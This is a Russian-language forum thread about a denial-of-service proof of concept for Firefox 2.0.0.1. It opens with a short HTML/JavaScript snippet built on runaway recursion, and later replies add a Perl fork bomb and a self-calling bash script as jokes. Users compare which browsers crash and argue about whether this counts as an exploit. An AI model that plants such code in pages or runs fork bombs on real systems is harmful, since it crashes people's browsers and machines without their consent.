Mozilla Firefox 2.0.0.1 DoS exploit

PoC exploit:

HTML:

<script>
function owned(){

setTimeout("owned()",1000);
owned();
}
</script>
<input type="foo" size="30" id="bar" onchange="owned()">

Протестироваться можно здесь: http://sapheal.cybersecurity.pl/blackbook/simple/ddarko_ABCDE.html

Багу нашел Michal Bucko.

 

мде =\ 4ё-то кодеры это не учли =\
Наверно в следующем апдейте исправят

 

Не наверное, а точнО! Все что сделано руками, человека. Всегда будут баги.

 

myIE тоже бьет =)

 

Arvi The Fakep
взял и обидел лисичку

 

мля ждем патча... пока слезу на оперу...

 

хмм... у меня Portable Firefox - не пашет чтота =)

 

Если мне память не изменяет то он с 1.5 делался, а не с двойки и вроде бы не обновлялся.(могу ошибаться)

 

Мда.

/me нашел мега-пупер-супер багу в перле

Code:

while (1) { fork; }

 

opera
Версия 9.0
Сборка 8031
упала ((

Огненый лисиц
1,5 бета 2, выстоял, не посрамив рудой хвост

осел намбер 6 упал сразу....

 

Opera
9.00 Beta
Build
8359
зашел на страницу, ждал ждал ничего не происходило посомтрел процес опера жрала 90 процентов =), но все равно все нормально грузилось правда с торможением =)

 

Тоже мне багу нашли.
Я тоже такую в линуксе нашел, ага:

script:
#!/bin/bash
./script

$ chmod +x script
$ ./script

 

При нормальных настройках системы не поможет: процесс сразу в минмальный приоритет уйдет.

 

ну на новых системах это не поможет.

а на старых поможет и еще как, это же саморазмножающийся скрипт

 

Так ето ж всего навсего отказ в обслуживании и всё... Тут ИМХо не очень страшно -ето ж не дыры в осле,с помощью которых можно подцепить что угодно =))

 

что за бред. Ещё эксплойтом назвали.

 

Что значит на новых и на старых?
тут только от того, как система настроена, зависит.
в том же древнем Alt Linux 2.4 у тебя такое не выйдет, т.к. система из коробки не имеет секурити-дефектов(кроме как старый софт, но ранье то он был новый)